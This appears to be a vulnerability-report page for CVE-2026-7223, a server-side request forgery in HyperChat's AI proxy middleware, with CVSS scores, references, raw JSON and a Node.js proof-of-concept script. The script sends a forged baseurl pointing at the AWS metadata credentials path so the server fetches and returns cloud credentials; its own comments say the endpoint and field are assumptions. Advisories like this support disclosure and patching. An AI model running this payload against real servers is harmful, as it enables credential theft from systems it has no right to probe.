Security Vulnerability Report
CVE-2026-7223 CVSS 7.3 HIGH

CVE-2026-7223

Published: 2026-04-28 04:16:29
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of the component AI Proxy Middleware. Such manipulation of the argument baseurl leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
7.3
Severity
HIGH (CVSS v3.1 primary score; the same source also publishes a CVSS v4.0 vector for this issue that scores 5.5 MEDIUM — see the raw JSON below)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

BigSweetPotatoStudio HyperChat <= 2.0.0-alpha.63

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript (Node.js — the listing uses `require`, `const` and `async/await`, not Python)
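// PoC for CVE-2026-7223: HyperChat SSRF
// Target: BigSweetPotatoStudio HyperChat <= 2.0.0-alpha.63
// Description: Exploiting the 'baseurl' parameter in AI Proxy Middleware
//
// Uses Node's built-in fetch (Node 18+), so the probe needs no third-party
// dependency (the original relied on axios).
//
// NOTE(review): the advisory only names the `baseurl` argument of fetch() in
// packages/core/src/http/aiProxyMiddleware.mts. The request path and the
// placement of `baseurl` as a JSON body field below are assumptions carried
// over from the original PoC — confirm both against the middleware source and
// the linked issue report before relying on this script.

'use strict';

// Target URL of the vulnerable HyperChat instance.
// Override with the first CLI argument or POC_TARGET.
const TARGET = process.argv[2] ?? process.env.POC_TARGET ?? 'http://vulnerable-host:3000';

// URL the server is coerced into fetching. The AWS IMDS credentials path is
// kept only as an illustration of impact; for authorized testing point this at
// a collaborator host you control so the outbound request is observable even
// when the proxy does not echo the fetched body. Override with the second CLI
// argument or POC_SSRF_URL.
const MALICIOUS_URL =
  process.argv[3] ?? process.env.POC_SSRF_URL ?? 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';

// Assumed proxy route — see the header note.
const ENDPOINT = '/api/chat/completions';

// Upper bound on a single probe; an unresponsive target aborts with AbortError.
const TIMEOUT_MS = 5000;

/**
 * Build the JSON body sent to the proxy.
 * @param {string} baseurl - URL the middleware is expected to forward to
 * @returns {{ messages: Array<{ role: string, content: string }>, baseurl: string }}
 */
function buildPayload(baseurl) {
  return {
    messages: [{ role: 'user', content: 'test' }],
    // The vulnerable parameter.
    baseurl,
  };
}

/**
 * POST the payload once and return the HTTP status plus the decoded body.
 * Redirects are not followed so a 30x issued by an internal service stays visible.
 * @param {string} target - base URL of the HyperChat instance (no trailing slash)
 * @param {string} baseurl - value placed in the `baseurl` field
 * @returns {Promise<{ status: number, data: unknown }>}
 * @throws {Error} on network failure or timeout (`error.name === 'AbortError'`)
 */
async function sendProbe(target, baseurl) {
  const response = await fetch(`${target}${ENDPOINT}`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(buildPayload(baseurl)),
    redirect: 'manual',
    signal: AbortSignal.timeout(TIMEOUT_MS),
  });
  const text = await response.text();
  let data;
  try {
    data = JSON.parse(text);
  } catch {
    // A non-JSON body (e.g. an HTML error page) is still useful evidence.
    data = text;
  }
  return { status: response.status, data };
}

/**
 * Send one SSRF probe to TARGET and print whatever comes back.
 * A response only proves the request reached the proxy; that the internal
 * URL was actually fetched must be confirmed from the echoed body or from
 * the collaborator log.
 */
async function exploit() {
  console.log(`[+] Sending SSRF payload to ${TARGET}...`);
  try {
    const { status, data } = await sendProbe(TARGET, MALICIOUS_URL);
    if (status >= 200 && status < 300) {
      console.log('[+] Request sent successfully!');
      console.log('[+] Response data:', JSON.stringify(data, null, 2));
    } else {
      console.log('[!] Server responded with status:', status);
      console.log('[!] Response data:', JSON.stringify(data, null, 2));
    }
  } catch (error) {
    console.error('[!] Exploit failed:', error.message);
  }
}

// Fire only when run directly (`node poc.js ...`), not when the file is loaded
// by a test harness. The typeof guard covers being loaded as an ES module,
// where `require` does not exist.
if (typeof require !== 'undefined' && require.main === module) {
  exploit();
}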

References (as listed in the raw JSON below)

- https://github.com/BigSweetPotatoStudio/HyperChat/
- https://github.com/BigSweetPotatoStudio/HyperChat/issues/142 (the issue report mentioned in the description)
- https://vuldb.com/submit/802265
- https://vuldb.com/vuln/359823
- https://vuldb.com/vuln/359823/cti

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7223", "sourceIdentifier": "[email protected]", "published": "2026-04-28T04:16:29.043", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of the component AI Proxy Middleware. Such manipulation of the argument baseurl leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/BigSweetPotatoStudio/HyperChat/", "source": "[email protected]"}, {"url": "https://github.com/BigSweetPotatoStudio/HyperChat/issues/142", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/802265", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359823", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359823/cti", "source": "[email protected]"}]}}